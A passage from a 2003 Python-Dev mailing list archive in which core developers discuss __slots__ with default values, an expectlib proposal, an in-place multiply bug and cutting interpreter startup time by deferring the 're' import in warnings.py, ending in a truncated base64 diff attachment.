These "constants" of yours are easily subverted by defining a subclass
which adds an instance __dict__ (any subclass that doesn't define
__slots__ of its own does this).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tdelaney@avaya.com  Tue May 13 22:40:10 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 14 May 2003 07:40:10 +1000
Subject: [Python-Dev] __slots__ and default values
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30D@au3010avexu1.global.avaya.com>

> From: Delaney, Timothy C (Timothy)=20
>=20
> class Pane (module): # Or whatever - you get the idea ;)
>=20
>     __slots__ =3D ('background', 'foreground', 'size',=20
> 'content', '__name__', '__file__')
>     __name__ =3D globals()['__name__']
>     __file__ =3D globals()['__file__']
>=20
>     background =3D 'black'
>     foreground =3D 'white'
>     size =3D (80, 25)
>=20
> import sys
> sys.modules[__name__] =3D Pane()

Hmm ... I was just wondering if we could use this technique to gain the =
advantages of fast lookup in other modules automatically (but =
optionally).

The idea is, the last line of your module includes a call which =
transforms your module into a module subclass instance with slots.

The functions in the module become methods which access the *class* =
instance variables (so they can modify them) but other modules can't.

A fair bit of work, and probably not worthwhile, but it's interesting to =
think about ;)

Tim Delaney


From tdelaney@avaya.com  Tue May 13 22:42:51 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Wed, 14 May 2003 07:42:51 +1000
Subject: [Python-Dev] __slots__ and default values
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F30E@au3010avexu1.global.avaya.com>

> From: Guido van Rossum [mailto:guido@python.org]
>=20
> > I would prefer to think of this is a useful feature rather than a
> > wart. Finally we can have true constants!
>=20
> Yuck.  If you want that, define a property-like class that doesn't
> allow setting.
>=20
> These "constants" of yours are easily subverted by defining a subclass
> which adds an instance __dict__ (any subclass that doesn't define
> __slots__ of its own does this).

Sorry - missing smiley there ;)

But see my other post for a potentially useful side-effect of this. Not =
something I think should be done, but fun to think about.

The idea is that you shouldn't be able to create a subclass without some =
really nasty work, as the only way to get it is to determine what module =
the module subclass is defined in, then grab the class out of that.

But it's a horrible hack and I should never have suggested it ;)

Tim Delaney


From lkcl@samba-tng.org  Tue May 13 23:57:40 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Tue, 13 May 2003 22:57:40 +0000
Subject: [Python-Dev] sf.net/708007: expectlib.py telnetlib.py split
Message-ID: <20030513225740.GH2305@localhost>

[i am not on the python-dev list but i check the archives, please cc me]

approximately two years ago i needed the functionality outlined
in the present telnetlib.py for several other remote protocols,
most notably commands (including ssh and bash) and also HTTP.

i figure that this functionality should be more than invaluable
to other python developers.

for example even the existing python libraries such as the
ftp client ftplib.py, which makes extensive use of regular
expressions to parse commands, could possibly benefit from
rewrites using the "new" expectlib.py.

also i believe it's the sort of thing that the twisted crowd
should already have invented, and they're mad if they haven't
already got something similar.


this message is therefore just a polite ping to the regular
python developers that the above referenced patch appears not
to have yet been looked at or assigned to anybody.

that having been said (perhaps with unintended implications
of criticism that the regular python developers are slackers,
which i most certainly am NOT saying!):

the expectlib.py / telnetlib.py split is not exactly a top
priority - just the sort of thing that one python fanatic
would classify as "nice to have".

l.

-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From python@rcn.com  Wed May 14 02:12:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Tue, 13 May 2003 21:12:03 -0400
Subject: [Python-Dev] Re: __slots__ and default values
References: <1052839518.3ec10e5e3f7c0@mcherm.com>
Message-ID: <002301c319b5$d44b8580$febd958d@oemcomputer>

> Aahz replies:
> > Why not do the initializing in __init__?
> 
> Michael:
> I presume that Raymond's concern was not that there wouldn't be
> a way to do initialization, but that this would become a new c.l.p
> FAQ and point of confusion for newbies. Unfortunately, I fear
> that it will. 

Yes.  Since it "works" with classic classes and unslotted newstyle
classes, it isn't terribly unreasonable to believe it would work 
with __slots__.  Further, there is no reason it couldn't work (either 
through an autoinit upon instance creation or through a default 
entry that references the class variable).

> Michael:
> Already I am seeing that people are "discovering"
> class variables as a sort of "initialized instance variable"
> instead of using __init__ as they "ought" to. Of course, it's NOT
> an initialized instance variable, but newbies stumble across it
> and seem to prefer it to using __init__.

Perhaps I skipped school the day they taught that was bad, but
it seems perfectly reasonable to me and I'm sure it is a common
practice.  I even find it to be clearer and more maintainable than
using __init__.  The only downside I see is that self.classvar += 1
reads from and writes to a different place.

So, a reworded version of my question is "why not?".  What is
the downside of providing behavior that is similar to non-slotted
classes?  What is gained by these blocking an assignment and
reporting a read-only error?

When I find an existing class can be made lighter by using __slots__,
it would be nice to transform it with a single line.  From:

class Tree(object):
    left = None
    right = None
    def __init__(self, value):
        self.value = value

adding only one line:
    __slots__ = ('left', 'right', 'value')

It would be a bummer to also have to move the left/right = None
into __init__ and transform them into self.left = self.right = None.

> Duncan Booth:
> The following works, but I can't remember whether you're supposed to be 
> able to use a dict in __slots__ or if it just happens to be allowed:
>
> >>> class Pane(object):
> __slots__ = { 'background': 'black', 'foreground': 'white',
>       'size': (80, 25) }
> def __init__(self):
> for k, v in self.__slots__.iteritems():
> setattr(self, k, v)

__slots__ accepts any iterable.  So, yes, you're allowed
eventhough that particular use was not intended.

There are several possible workarounds including metaclasses.
My question is why there needs to be a workaround at all.


> Thomas Heller:
> Unrelated to *this* topic, but Andrew's "What's new in Python 2.2" still
> presents __slots__ as a way to constrain the instance variables:
> 
> A new-style class can define a class attribute named __slots__ to
>  constrain the list of legal attribute names.

Though I think of __slots__ as a way to make lighter weight instances,
constraining instance variables is also one of its functions. 


Raymond Hettinger


From guido@python.org  Wed May 14 02:38:27 2003
From: guido@python.org (Guido van Rossum)
Date: Tue, 13 May 2003 21:38:27 -0400
Subject: [Python-Dev] Re: __slots__ and default values
In-Reply-To: "Your message of Tue, 13 May 2003 21:12:03 EDT."
 <002301c319b5$d44b8580$febd958d@oemcomputer>
References: <1052839518.3ec10e5e3f7c0@mcherm.com>
 <002301c319b5$d44b8580$febd958d@oemcomputer>
Message-ID: <200305140138.h4E1cRx02045@pcp02138704pcs.reston01.va.comcast.net>

> Yes.  Since it "works" with classic classes and unslotted newstyle
> classes, it isn't terribly unreasonable to believe it would work 
> with __slots__.  Further, there is no reason it couldn't work (either 
> through an autoinit upon instance creation or through a default 
> entry that references the class variable).

Really?  The metaclass would have to copy the initializers to a
safekeeping place, because they compete with the slot descriptors.
Don't forget that when you write __slots__ = ['a', 'b', 'c'],
descriptors named a, b and c are inserted into the class dict by the
metaclass.  And then the metaclass would have to add a hidden
initializer that initializes the slot.  Very messy...

> > Michael:
> > Already I am seeing that people are "discovering"
> > class variables as a sort of "initialized instance variable"
> > instead of using __init__ as they "ought" to. Of course, it's NOT
> > an initialized instance variable, but newbies stumble across it
> > and seem to prefer it to using __init__.
> 
> Perhaps I skipped school the day they taught that was bad, but
> it seems perfectly reasonable to me and I'm sure it is a common
> practice.  I even find it to be clearer and more maintainable than
> using __init__.  The only downside I see is that self.classvar += 1
> reads from and writes to a different place.

It's also a bad idea for initializers that aren't immutable, because
the initial values are shared between all instances (another example
of the "aliasing" problem, also known from default argument values).

> So, a reworded version of my question is "why not?".  What is
> the downside of providing behavior that is similar to non-slotted
> classes?  What is gained by these blocking an assignment and
> reporting a read-only error?

It's not like I did any work to prevent what you want from working.
Rather, what you seem to want would be hard to implement (see above).

> When I find an existing class can be made lighter by using __slots__,
> it would be nice to transform it with a single line.  From:
> 
> class Tree(object):
>     left = None
>     right = None
>     def __init__(self, value):
>         self.value = value
> 
> adding only one line:
>     __slots__ = ('left', 'right', 'value')
> 
> It would be a bummer to also have to move the left/right = None
> into __init__ and transform them into self.left = self.right = None.

Maybe I should remove slots from the language?  <0.5 wink> They seem
to be the most widely misunderstood feature of Python 2.2.  If you
don't understand how they work, please don't use them.

> > Duncan Booth:
> > The following works, but I can't remember whether you're supposed to be 
> > able to use a dict in __slots__ or if it just happens to be allowed:
> >
> > >>> class Pane(object):
> > __slots__ = { 'background': 'black', 'foreground': 'white',
> >       'size': (80, 25) }
> > def __init__(self):
> > for k, v in self.__slots__.iteritems():
> > setattr(self, k, v)
> 
> __slots__ accepts any iterable.  So, yes, you're allowed
> eventhough that particular use was not intended.

This loophole was intentionally left for people to find a good use for.

> There are several possible workarounds including metaclasses.
> My question is why there needs to be a workaround at all.

I hope that has been answered by now.

> > Thomas Heller:
> > Unrelated to *this* topic, but Andrew's "What's new in Python 2.2" still
> > presents __slots__ as a way to constrain the instance variables:
> > 
> > A new-style class can define a class attribute named __slots__ to
> >  constrain the list of legal attribute names.
> 
> Though I think of __slots__ as a way to make lighter weight instances,
> constraining instance variables is also one of its functions. 

Not true.  That is at best an unintended side effect of slots.  And
there's nothing against having __slots__ include __dict__, so your
instance has a __dict__ as well as slots.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From python@rcn.com  Wed May 14 07:51:24 2003
From: python@rcn.com (Raymond Hettinger)
Date: Wed, 14 May 2003 02:51:24 -0400
Subject: [Python-Dev] Re: __slots__ and default values
References: <1052839518.3ec10e5e3f7c0@mcherm.com> <002301c319b5$d44b8580$febd958d@oemcomputer> <200305140138.h4E1cRx02045@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <003e01c319e5$3d044100$8427c797@oemcomputer>

> It's also a bad idea for initializers that aren't immutable, because
> the initial values are shared between all instances (another example
> of the "aliasing" problem, also known from default argument values).

Right.  I once knew that and had forgotten.


> > Though I think of __slots__ as a way to make lighter weight instances,
> > constraining instance variables is also one of its functions. 
> 
> Not true.  That is at best an unintended side effect of slots.  And
> there's nothing against having __slots__ include __dict__, so your
> instance has a __dict__ as well as slots.

That's something I never knew but wish I had known (and I *have*
read the source).  Live and learn.


Raymond








From mwh@python.net  Wed May 14 10:53:04 2003
From: mwh@python.net (Michael Hudson)
Date: Wed, 14 May 2003 10:53:04 +0100
Subject: [Python-Dev] Inplace multiply
In-Reply-To: <000401c31974$ac31c730$6801a8c0@NICKLEBY> ("Paul Dubois"'s
 message of "Tue, 13 May 2003 10:25:38 -0700")
References: <000401c31974$ac31c730$6801a8c0@NICKLEBY>
Message-ID: <2mvfwdsvlr.fsf@starship.python.net>

"Paul Dubois" <paul@pfdubois.com> writes:

> My "masked array" class MA has a problem that I don't know how to solve. The
> inplace multiply function
>
>     def __imul__ (self, other)
>
> is not getting called while my other input operations do work. The scenario
> is
>
> x = MA.array(...)
>
> x *= c
>
> If c is an int, this works correctly, calling MA.__imul__. Otherwise, I get
> a message from the Python runtime saying it can't multiply a sequence by a
> non-int. But change MA to Numeric, it works.
>
> Numeric is an extension type and MA is a (new style) class. MA defines
> __len__ as well as all the math operators.

What version of Python?  This smells like a bug that has been
(thought) fixed.

Cheers,
M.

-- 
  The ability to quote is a serviceable substitute for wit.
                                                -- W. Somerset Maugham


From guido@python.org  Wed May 14 15:03:08 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 14 May 2003 10:03:08 -0400
Subject: [Python-Dev] Re: __slots__ and default values
In-Reply-To: Your message of "Wed, 14 May 2003 02:51:24 EDT."
 <003e01c319e5$3d044100$8427c797@oemcomputer>
References: <1052839518.3ec10e5e3f7c0@mcherm.com> <002301c319b5$d44b8580$febd958d@oemcomputer> <200305140138.h4E1cRx02045@pcp02138704pcs.reston01.va.comcast.net>
 <003e01c319e5$3d044100$8427c797@oemcomputer>
Message-ID: <200305141403.h4EE38F25569@odiug.zope.com>

> > Not true.  That is at best an unintended side effect of slots.  And
> > there's nothing against having __slots__ include __dict__, so your
> > instance has a __dict__ as well as slots.
> 
> That's something I never knew but wish I had known (and I *have*
> read the source).  Live and learn.

Actually I think that's new in 2.3.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paul@pfdubois.com  Wed May 14 16:12:35 2003
From: paul@pfdubois.com (Paul Dubois)
Date: Wed, 14 May 2003 08:12:35 -0700
Subject: [Python-Dev] inplace multiply problem was a bug that has been fixed
Message-ID: <000101c31a2b$4048e1e0$6801a8c0@NICKLEBY>

My question about inplace multiply was answered by Todd Miller: it was a bug
in Python that is now fixed. I upgraded and my problem went away.



From jeremy@zope.com  Wed May 14 16:55:57 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 14 May 2003 11:55:57 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
Message-ID: <1052927757.7258.38.camel@slothrop.zope.com>

I don't know if this thread came to any conclusion.  I did the same
strace that everyone else has reported on, and I've included a summary
of the results here.  I have one directory in my PYTHONPATH, which
affects the number of directories that are searched for each imported
module.

Comparing Python 2.3 current CVS with Python 2.2 CVS, I see the
following system call counts (limited to top 6 in 2.3).

         2.3   2.2
open     305   104
stat64   102    44
fstat64   74    34
read      71    30
rt_sig... 69    68
brk       62    74

When a single module is imported from the standard library, Python 2.2
looks in 10 different places.  Specifically, it looks for five different
files in two different directories -- PYTHONPATH and the std library
directory.  For files that aren't found (e.g. sitecustomize), it looks
in 25 places (5 files x 5 directories).  Interesting to note that
PYTHONPATH directory is not searched for sitecustomize.

In Python 2.3, the standard library module requires 15 lookups because
/usr/local/lib/python23.zip is added to the path before the std library
directory.  The failed lookup of sitecustomize takes 35 lookups, because
PYTHONPATH and python23.zip are now on the path.

The list of attempted imports is much larger in 2.3 than in 2.2.

 -- 2.3 --                     -- 2.2 --
                             __future__
codecs
copy_reg                     copy_reg
encodings
encodings/__init__
encodings/aliases
encodings/iso_8859_15
exceptions
linecache
os                           os
posixpath                    posixpath
re
site                         site
sitecustomize                sitecustomize
sre
sre_compile
sre_constants
sre_parse
stat                         stat
string
strop
types                        types
UserDict                     UserDict
warnings
  22 total                     7 total

The increase in open, stat64, and fstat64 all seem consistent with a 3x
increase in the number of modules searched for.

The use of re in the warnings module seems the primary culprit, since it
pulls in re, sre and friends, string, and strop.

Jeremy




From noah@noah.org  Wed May 14 17:34:32 2003
From: noah@noah.org (Noah Spurrier)
Date: Wed, 14 May 2003 09:34:32 -0700
Subject: [Python-Dev] Re: sf.net/708007: expectlib.py telnetlib.py split
Message-ID: <3EC27018.9020503@noah.org>

Tell me more about expectlib.py. Is it pty based?
I ask because I wonder if it's like my pexpect module:
     http://pexpect.sourceforge.net/

Yours,
Noah



From python@rcn.com  Wed May 14 17:55:22 2003
From: python@rcn.com (Raymond Hettinger)
Date: Wed, 14 May 2003 12:55:22 -0400
Subject: [Python-Dev] Re: sf.net/708007: expectlib.py telnetlib.py split
References: <3EC27018.9020503@noah.org>
Message-ID: <003001c31a39$9c554d80$7c22a044@oemcomputer>

> Tell me more about expectlib.py. Is it pty based?
> I ask because I wonder if it's like my pexpect module:
>      http://pexpect.sourceforge.net/

Hello Noah,

Googling for "expect.py" gives several useful hits:
   http://www.google.com/search?sourceid=navclient&q=expect%2Epy

If those don't answer your question, I recommend posting to
the comp.lang.python newgroup where you can benefit from
the experiences of hundreds of users.

The python-dev list isn't a good place to follow-up because
these kinds of questions are not the primary focus here.


Raymond Hettinger


From skip@pobox.com  Wed May 14 18:35:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 12:35:13 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1052927757.7258.38.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
Message-ID: <16066.32337.635236.691405@montanaro.dyndns.org>

    Jeremy> I don't know if this thread came to any conclusion.  

I don't think so.  I think it bogged down about the time I suggested that
executing import from within a function might slow things down.

    Jeremy> The use of re in the warnings module seems the primary culprit,
    Jeremy> since it pulls in re, sre and friends, string, and strop.

I just peeked at warnings.py.  None of the uses of re.* in there seem like
they'd be in time-critical functions.  The straightforward change (migrate
"import re" into the functions which use the module) worked for me, so I
went ahead and checked it in.

Skip


From guido@python.org  Wed May 14 18:37:22 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 14 May 2003 13:37:22 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: Your message of "Wed, 14 May 2003 10:33:55 PDT."
 <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
Message-ID: <200305141737.h4EHbMv06730@odiug.zope.com>

> Modified Files:
> 	warnings.py 
> Log Message:
> defer re module imports to help improve interpreter startup

Are you sure that's going to help?  "import warnings" callse
_processoptions() and makes a few calls to filterwarnings() which
brings in the re module anyway...

--Guido van Rossum (home page: http://www.python.org/~guido/)



From jeremy@zope.com  Wed May 14 18:45:33 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 14 May 2003 13:45:33 -0400
Subject: [Python-Dev] Startup time
In-Reply-To: <16066.32337.635236.691405@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <16066.32337.635236.691405@montanaro.dyndns.org>
Message-ID: <1052934332.7260.45.camel@slothrop.zope.com>

On Wed, 2003-05-14 at 13:35, Skip Montanaro wrote:
>     Jeremy> I don't know if this thread came to any conclusion.  
> 
> I don't think so.  I think it bogged down about the time I suggested that
> executing import from within a function might slow things down.
> 
>     Jeremy> The use of re in the warnings module seems the primary culprit,
>     Jeremy> since it pulls in re, sre and friends, string, and strop.
> 
> I just peeked at warnings.py.  None of the uses of re.* in there seem like
> they'd be in time-critical functions.  The straightforward change (migrate
> "import re" into the functions which use the module) worked for me, so I
> went ahead and checked it in.

Guido and I looked at that briefly.  It doesn't make any difference does
it?  The functions that use re are called when the module is imported.

Jeremy




From skip@pobox.com  Wed May 14 19:02:05 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 13:02:05 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <200305141737.h4EHbMv06730@odiug.zope.com>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
 <200305141737.h4EHbMv06730@odiug.zope.com>
Message-ID: <16066.33949.903064.834797@montanaro.dyndns.org>

    >> defer re module imports to help improve interpreter startup

    Guido> Are you sure that's going to help?  "import warnings" callse
    Guido> _processoptions() and makes a few calls to filterwarnings() which
    Guido> brings in the re module anyway...

Apparently not. :-( The call to _processoptions() won't hurt unless the user
invokes the interpreter with a -W arg.  Not much we can do there.  I think
the import in filterwarnings can be avoided by deferring the re compilation
until warn_explicit.  I'll see what I can come up with and submit a patch.

Skip


From skip@pobox.com  Wed May 14 19:02:42 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 13:02:42 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <1052934332.7260.45.camel@slothrop.zope.com>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]>
 <1052927757.7258.38.camel@slothrop.zope.com>
 <16066.32337.635236.691405@montanaro.dyndns.org>
 <1052934332.7260.45.camel@slothrop.zope.com>
Message-ID: <16066.33986.472857.935825@montanaro.dyndns.org>

    Jeremy> Guido and I looked at that briefly.  It doesn't make any
    Jeremy> difference does it?  The functions that use re are called when
    Jeremy> the module is imported.

You're right.  I'll come up with something.

Skip





From jepler@unpythonic.net  Wed May 14 19:08:03 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 14 May 2003 13:08:03 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <16066.33986.472857.935825@montanaro.dyndns.org>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com> <16066.32337.635236.691405@montanaro.dyndns.org> <1052934332.7260.45.camel@slothrop.zope.com> <16066.33986.472857.935825@montanaro.dyndns.org>
Message-ID: <20030514180801.GN11289@unpythonic.net>

On Wed, May 14, 2003 at 01:02:42PM -0500, Skip Montanaro wrote:
> 
>     Jeremy> Guido and I looked at that briefly.  It doesn't make any
>     Jeremy> difference does it?  The functions that use re are called when
>     Jeremy> the module is imported.
> 
> You're right.  I'll come up with something.

I'd suggested (or I think I suggested) that re needs to only be imported
when message != "" in filterwarnings.  The other use, in _processoptions
-> _setoption, is only hit when sys.warnoptions has a non-empty value.

This still leaves the usage of re in
encodings.__init__.normalize_encoding() which I also suggested moving
into the function --however, I never checked when .normalize_encoding()
is called, so it might always be hit at startup anyway.  This could also
be rewritten as string operations, too.

Jeff


From skip@pobox.com  Wed May 14 19:14:43 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 13:14:43 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <16066.33949.903064.834797@montanaro.dyndns.org>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
 <200305141737.h4EHbMv06730@odiug.zope.com>
 <16066.33949.903064.834797@montanaro.dyndns.org>
Message-ID: <16066.34707.101894.297890@montanaro.dyndns.org>

    Skip> I'll see what I can come up with and submit a patch.

Okay, this seems too simple. ;-) There's no need to compile the message and
module arguments to filterwarnings.  Just store them as strings and call
re.match() later with the appropriate args.  That takes care of that one.  I
think use of the -W command line flag is infrequent enough that it doesn't
really matter that _processoptions, _setoption and -getcategory might get
called at startup.  Most of the time sys.warnoptions will be an empty list,
so _setoption and _getcategory won't be called.

Aside: Why are message and module names given on the command line treated as
literal strings while message and module names which are passed directly to
filterwarnings() treated as regular expressions?  If they were treated as
regular expressions, the calls to re.escape() could be removed and
_setoptions wouldn't use re either.

Skip


From guido@python.org  Wed May 14 19:23:16 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 14 May 2003 14:23:16 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: Your message of "Wed, 14 May 2003 13:14:43 CDT."
 <16066.34707.101894.297890@montanaro.dyndns.org>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net> <200305141737.h4EHbMv06730@odiug.zope.com> <16066.33949.903064.834797@montanaro.dyndns.org>
 <16066.34707.101894.297890@montanaro.dyndns.org>
Message-ID: <200305141823.h4EINGt15343@odiug.zope.com>

>     Skip> I'll see what I can come up with and submit a patch.
> 
> Okay, this seems too simple. ;-) There's no need to compile the message and
> module arguments to filterwarnings.  Just store them as strings and call
> re.match() later with the appropriate args.  That takes care of that one.  I
> think use of the -W command line flag is infrequent enough that it doesn't
> really matter that _processoptions, _setoption and -getcategory might get
> called at startup.  Most of the time sys.warnoptions will be an empty list,
> so _setoption and _getcategory won't be called.

OK.  Please report old and new startup times!

> Aside: Why are message and module names given on the command line treated as
> literal strings while message and module names which are passed directly to
> filterwarnings() treated as regular expressions?  If they were treated as
> regular expressions, the calls to re.escape() could be removed and
> _setoptions wouldn't use re either.

Um, I don't remember.  It would seem to be useful, wouldn't it?  The
only reason I can come up with is that for dotted names, the dot would
have to be escaped on the command line, and escaping something on the
command line is painful because \ is also a shell escape character, so
you'd have to escape the escape.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Wed May 14 20:32:23 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 14 May 2003 14:32:23 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py, 1.19, 1.20
In-Reply-To: <200305141823.h4EINGt15343@odiug.zope.com>
References: <E19G08Z-0003us-00@sc8-pr-cvs1.sourceforge.net>
 <200305141737.h4EHbMv06730@odiug.zope.com>
 <16066.33949.903064.834797@montanaro.dyndns.org>
 <16066.34707.101894.297890@montanaro.dyndns.org>
 <200305141823.h4EINGt15343@odiug.zope.com>
Message-ID: <16066.39367.822086.836812@montanaro.dyndns.org>

--g4s0SsAiBg
Content-Type: text/plain; charset=us-ascii
Content-Description: message body text
Content-Transfer-Encoding: 7bit


    Guido> OK.  Please report old and new startup times!

That seems to be a little harder than you'd think.  First, I had to fix
encodings/__init__.py as well.  Here are some numbers.  In all cases the
interpreter is as I built it from CVS on May 6.  PYTHONSTARTUP is not
defined.

    "import re" at top level:

    Without -S (best real time of 5 runs):

        % time python -c pass
        
        real    0m0.169s
        user    0m0.100s
        sys     0m0.030s

    With -S (best of 5):

        % time python -S -c pass
        
        real    0m0.125s
        user    0m0.020s
        sys     0m0.080s

    Proposed mods to warnings.py (and provisional replacement of re with
    string translation tables in encodings/__init__.py):

    Without -S (best of 5):

        % time python -c pass

        real    0m0.187s
        user    0m0.120s
        sys     0m0.030s

    With -S (best of 5):

        % time python -S -c pass

        real    0m0.118s
        user    0m0.020s
        sys     0m0.020s

Not too exciting.  I verified using -v that these modules are imported in
2.3 with no PYTHONSTARTUP and the -S flag after my changes:

    UserDict
    copy_reg
    linecache
    os
    posix
    posixpath
    stat
    types
    warnings
    zipimport

Without -S (and my sitecustomize.py file moved) I get these:

    UserDict
    copy_reg
    linecache
    os
    posix
    posixpath
    site
    stat
    types
    warnings
    zipimport

I've got to get back to some paying work, so I can't pursue this more at the
moment.  Attached are my current diffs for warnings.py and encodings/
__init__.py if someone has a few moments to look at it.

Skip


--g4s0SsAiBg
Content-Type: application/octet-stream
Content-Disposition: attachment;
        filename="nore.diff"
Content-Transfer-Encoding: base64

SW5kZXg6IExpYi93YXJuaW5ncy5weQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09ClJDUyBmaWxlOiAvY3Zzcm9v
dC9weXRob24vcHl0aG9uL2Rpc3Qvc3JjL0xpYi93YXJuaW5ncy5weSx2CnJldHJpZXZpbmcg
cmV2aXNpb24gMS4yMApkaWZmIC1jIC1yMS4yMCB3YXJuaW5ncy5weQoqKiogTGliL3dhcm5p
bmdzLnB5CTE0IE1heSAyMDAzIDE3OjMzOjUzIC0wMDAwCTEuMjAKLS0tIExpYi93YXJuaW5n
cy5weQkxNCBNYXkgMjAwMyAxOToyNzozMiAtMDAwMAoqKioqKioqKioqKioqKioKKioqIDMs
OSAqKioqCiAgIyBOb3RlOiBmdW5jdGlvbiBsZXZlbCBpbXBvcnRzIHNob3VsZCAqbm90KiBi
ZSB1c2VkCiAgIyBpbiB0aGlzIG1vZHVsZSBhcyBpdCBtYXkgY2F1c2UgaW1wb3J0IGxvY2sg
ZGVhZGxvY2suCiAgIyBTZWUgYnVnIDY4MzY1OC4KISBpbXBvcnQgc3lzLCB0eXBlcwogIGlt
cG9ydCBsaW5lY2FjaGUKICAKICBfX2FsbF9fID0gWyJ3YXJuIiwgInNob3d3YXJuaW5nIiwg
ImZvcm1hdHdhcm5pbmciLCAiZmlsdGVyd2FybmluZ3MiLAotLS0gMyw5IC0tLS0KICAjIE5v
dGU6IGZ1bmN0aW9uIGxldmVsIGltcG9ydHMgc2hvdWxkICpub3QqIGJlIHVzZWQKICAjIGlu
IHRoaXMgbW9kdWxlIGFzIGl0IG1heSBjYXVzZSBpbXBvcnQgbG9jayBkZWFkbG9jay4KICAj
IFNlZSBidWcgNjgzNjU4LgohIGltcG9ydCBzeXMsIHJlLCB0eXBlcwogIGltcG9ydCBsaW5l
Y2FjaGUKICAKICBfX2FsbF9fID0gWyJ3YXJuIiwgInNob3d3YXJuaW5nIiwgImZvcm1hdHdh
cm5pbmciLCAiZmlsdGVyd2FybmluZ3MiLAoqKioqKioqKioqKioqKioKKioqIDEyOSwxMzUg
KioqKgogICAgICAiIiJJbnNlcnQgYW4gZW50cnkgaW50byB0aGUgbGlzdCBvZiB3YXJuaW5n
cyBmaWx0ZXJzIChhdCB0aGUgZnJvbnQpLgogIAogICAgICBVc2UgYXNzZXJ0aW9ucyB0byBj
aGVjayB0aGF0IGFsbCBhcmd1bWVudHMgaGF2ZSB0aGUgcmlnaHQgdHlwZS4iIiIKLSAgICAg
aW1wb3J0IHJlCiAgICAgIGFzc2VydCBhY3Rpb24gaW4gKCJlcnJvciIsICJpZ25vcmUiLCAi
YWx3YXlzIiwgImRlZmF1bHQiLCAibW9kdWxlIiwKICAgICAgICAgICAgICAgICAgICAgICAg
Im9uY2UiKSwgImludmFsaWQgYWN0aW9uOiAlcyIgJSBgYWN0aW9uYAogICAgICBhc3NlcnQg
aXNpbnN0YW5jZShtZXNzYWdlLCBiYXNlc3RyaW5nKSwgIm1lc3NhZ2UgbXVzdCBiZSBhIHN0
cmluZyIKLS0tIDEyOSwxMzQgLS0tLQoqKioqKioqKioqKioqKioKKioqIDE2MywxNjkgKioq
KgogIAogICMgSGVscGVyIGZvciBfcHJvY2Vzc29wdGlvbnMoKQogIGRlZiBfc2V0b3B0aW9u
KGFyZyk6Ci0gICAgIGltcG9ydCByZQogICAgICBwYXJ0cyA9IGFyZy5zcGxpdCgnOicpCiAg
ICAgIGlmIGxlbihwYXJ0cykgPiA1OgogICAgICAgICAgcmFpc2UgX09wdGlvbkVycm9yKCJ0
b28gbWFueSBmaWVsZHMgKG1heCA1KTogJXMiICUgYGFyZ2ApCi0tLSAxNjIsMTY3IC0tLS0K
KioqKioqKioqKioqKioqCioqKiAyMDAsMjA2ICoqKioKICAKICAjIEhlbHBlciBmb3IgX3Nl
